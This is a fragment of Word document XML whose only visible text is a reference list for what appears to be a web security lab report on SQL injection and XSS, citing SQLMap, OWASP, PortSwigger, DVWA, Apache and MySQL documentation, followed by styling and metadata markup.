            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:br/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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SQLMap -</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t xml:space="preserve"> http://sqlmap.org</w:t>
        </w:r>
        <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:br/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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OWASP SQL Injection -</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t xml:space="preserve"> https://owasp.org/www-community/attacks/SQL_Injection</w:t>
        </w:r>
        <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:br/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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OWASP XSS -</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t xml:space="preserve"> https://owasp.org/www-community/attacks/xss/</w:t>
        </w:r>
        <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:br/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Apache2 Documentation -</w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t xml:space="preserve"> https://httpd.apache.org/docs/</w:t>
        </w:r>
        <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:br/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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MySQL Documentation -</w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t xml:space="preserve"> https://dev.mysql.com/doc/</w:t>
        </w:r>
        <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:br/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB1BEB" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>OWASP Cheat Sheet Series -</w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="00D9326A" w:rsidRPr="00454180">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t xml:space="preserve"> https://cheatsheetseries.owasp.org</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F366F8" w:rsidRPr="00454180" w:rsidRDefault="00EB1BEB" w:rsidP="0046636F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="80" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00454180">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>SQL Injection Testing Guide -</w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidR="00046312" w:rsidRPr="00454180">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="00454180">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:bCs/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-IN"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/sql-injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00F366F8" w:rsidRPr="00454180">
      <w:headerReference w:type="default" r:id="rId26"/>
      <w:footerReference w:type="default" r:id="rId27"/>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43D5" w:rsidRDefault="00E343D5">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E343D5" w:rsidRDefault="00E34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Calibri"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Lora SemiBold">
    <w:altName w:val="Calibri"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Lora 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66F8" w:rsidRDefault="0046636F">
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="002A4E31">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43D5" w:rsidRDefault="00E343D5">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00E343D5" w:rsidRDefault="00E34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66F8" w:rsidRDefault="00F366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D54"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99A0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E3E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="15FA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91107"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3ED87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A06FD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7632F240"/>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B7C8C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9CA6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92352"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B6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83B0C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D04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B0382"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="928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8116D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FCBC40DA"/>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D17B1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="470C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511A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="281C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96C6D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C976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6279B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53FA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4"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="3"/>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6F8"/>
    <w:rsid w:val="00046312"/>
    <w:rsid w:val="002A4E31"/>
    <w:rsid w:val="00454180"/>
    <w:rsid w:val="0046636F"/>
    <w:rsid w:val="004A6E38"/>
    <w:rsid w:val="00602FA4"/>
    <w:rsid w:val="00605626"/>
    <w:rsid w:val="008463AE"/>
    <w:rsid w:val="009655B0"/>
    <w:rsid w:val="00AB3FC2"/>
    <w:rsid w:val="00C941D3"/>
    <w:rsid w:val="00CD0C24"/>
    <w:rsid w:val="00D23D7F"/>
    <w:rsid w:val="00D9326A"/>
    <w:rsid w:val="00E343D5"/>
    <w:rsid w:val="00EB1BEB"/>
    <w:rsid w:val="00F36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3C32"/>
  <w15:docId w15:val="{A49E7002-897B-4C85-9B12-377B00BC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A4E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A4E31"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002A4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A4E31"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002A4E31"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002A4E31"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008463A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B1BEB"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
      </w:tabs>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:lang w:val="en-IN" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008463AE"/>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9326A"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D93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470549">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="473564422">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1341739380">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1349599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20https://github.com/digininja/DVWA"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20https://owasp.org/www-community/attacks/xs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portswigger.net/web-security/sql-injecti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20https://owasp.org/www-community/attacks/SQL_Inje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20https://cheatsheetseries.owasp.or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20https://dev.mysql.com/doc/"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20http://sqlmap.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20https://httpd.apache.org/doc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3049F-53E5-4240-A155-027676B8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15</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Venky</dc:creator>
  <cp:lastModifiedBy>Mohan Venky</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-18T09:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-19T15:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>